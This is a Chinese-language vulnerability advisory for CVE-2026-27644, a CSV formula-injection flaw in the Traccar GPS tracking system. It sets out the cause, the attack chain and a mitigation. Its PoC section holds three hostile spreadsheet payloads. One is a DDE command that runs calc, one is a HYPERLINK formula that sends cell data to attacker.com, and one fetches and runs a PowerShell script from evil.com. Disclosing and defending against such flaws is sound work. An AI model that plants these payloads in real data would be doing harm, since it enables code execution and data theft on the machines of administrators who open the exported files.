IPBUF安全漏洞报告
English
CVE-2026-27644 CVSS 6.5 中危

CVE-2026-27644 Traccar CSV导出公式注入漏洞

披露日期: 2026-05-05
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-27644
漏洞类型
CSV注入
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Traccar

相关标签

CSV注入Traccar公式注入远程代码执行

漏洞概述

Traccar是一个开源GPS跟踪系统。在6.11.1至6.13.0版本中,其CSV导出功能存在安全漏洞。该功能在将位置数据(包括用户控制的设备和计算属性)写入CSV输出时,未进行适当的转义处理。攻击者可以利用此漏洞通过导出字段注入电子表格公式。当管理员或经理在电子表格软件(如Excel)中打开导出的CSV文件时,恶意公式将被执行,从而导致命令执行或数据泄露。该问题已在6.13.0版本中修复。

技术细节

该漏洞属于CSV注入(也称为公式注入)漏洞。其根本原因在于Traccar服务器端的CsvExportProvider在生成CSV报告时,直接将用户可控的输入(如设备名称、自定义属性等)拼接到CSV文件中,而未对特殊字符(如=、+、-、@)进行过滤或转义。攻击者只需拥有低权限账户,即可修改设备名称或属性为恶意载荷,例如=cmd|' /C calc'!A0。当具有高权限的管理员导出CSV并使用Excel或WPS等软件打开时,这些软件会自动解析以等号开头的字符串为公式。这可能导致恶意代码执行(如DDE攻击)或敏感数据通过HTTP请求发送到攻击者控制的服务器。由于CVSS向量包含S:C,该漏洞利用成功后可能影响其他系统组件。

攻击链分析

STEP 1
1. 初始访问
攻击者获取Traccar系统的低权限用户账户(PR:L)。
STEP 2
2. 武器化与投递
攻击者修改其控制的设备属性或名称,注入恶意的电子表格公式(如以=开头的DDE命令)。
STEP 3
3. 利用
管理员或经理使用CSV导出功能下载数据,并在电子表格软件中打开该文件(UI:R),触发公式解析。
STEP 4
4. 影响
恶意公式在管理员的终端上执行,可能导致系统被控制、命令执行或敏感数据外泄(C:L/I:L/A:L)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# Proof of Concept for CVE-2026-27644 (CSV Injection) # An attacker with low privileges can inject a formula into a device attribute. # Payload 1: Windows Command Execution (using DDE) payload_cmd = "=cmd|' /C calc'!A0" # Payload 2: Data Exfiltration (exfiltrating cell content to remote server) payload_exfil = "=HYPERLINK(\"http://attacker.com/steal?data=\"&A2,\"Click here\")" # Payload 3: PowerShell Execution payload_psh = "=MSEXCEL|'\\..\\..\\..\\..\\Windows\\System32\\cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString(\"http://evil.com/shell.ps1\")'!'!'" # Steps to reproduce: # 1. Login to Traccar as a regular user. # 2. Go to device settings and update the 'Unique ID' or a custom attribute to one of the payloads above. # 3. Ask an administrator to export the positions/reports to CSV. # 4. When the admin opens the CSV in Excel, the formula executes. print(f"Payload to inject: {payload_cmd}")

影响范围

Traccar > 6.11.1
Traccar < 6.13.0

防御指南

临时缓解措施
建议用户在打开来源不可信的CSV文件时,首先使用纯文本编辑器(如Notepad)检查内容,避免直接使用Excel等电子表格软件双击打开,以防止公式自动执行。同时,应尽快应用官方补丁进行升级。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表